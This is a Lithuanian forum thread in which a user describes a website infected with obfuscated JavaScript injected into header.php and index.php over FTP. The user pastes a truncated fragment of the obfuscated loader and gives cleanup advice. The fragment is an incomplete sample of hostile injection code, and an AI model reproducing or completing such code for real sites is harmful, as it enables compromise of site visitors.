Pagadinau koda ir imetu:
c=3-1;i;=-1;-1 c;;pa;rse;;;Int;if(p("01" " "3")===83 )try{B;oolean()["pr" "otot;" "ype";].q}cat;c h(egewgsd){if(window.document)f=
Sitas skriptas fotke kazkokia sukuria? Kokia cia kalba isvis? Man va dabar ismeta irgi kartais kad JS scriptas, kuris yra fb.JPG faile...
Tuoj failus prasisaugosiu ir laikas jau WIN prasivalyt tikriausiai. Nes atradau ta faila, istryniau ir nebemete, poto vel nueijau i WINSCP ir vel pradejo metyt.
Oj, netaip supratau. Tai cia hostingas gal uzkrestas? Nes va as ta fotke pas save isikeliau.
Issivaliau. Zodziu esme tokia:
1. Tinklapio failams pakenkiama, kai su FTP narsykle prisijungi prie failu.
2. <script>tratatatatatat</script> tokiose vietose pasislepes zalingas turinys.
3. Source koda paziurejus galima greiciau atrasti, kokiame faile jis pasislepes. Man pakliuvo i header.php ( wordpress'e ) ir index.php (mano pacio TVS).
Is to pacio kompo, kuriame infekcija yra neapsimoka nieko daryti, geriau su kitu prisijungti prie failu ir apsivalyti. Tada atsisiunciam STOPzilla programa ir ji turetu pravalyti tokius dalykus.
Pakolkas ir is sito PC jau nebepridaro man nieksybiu, bet betkuriuo atveju WIN persirasysiu.
Naudok žinutės redagavimo funkciją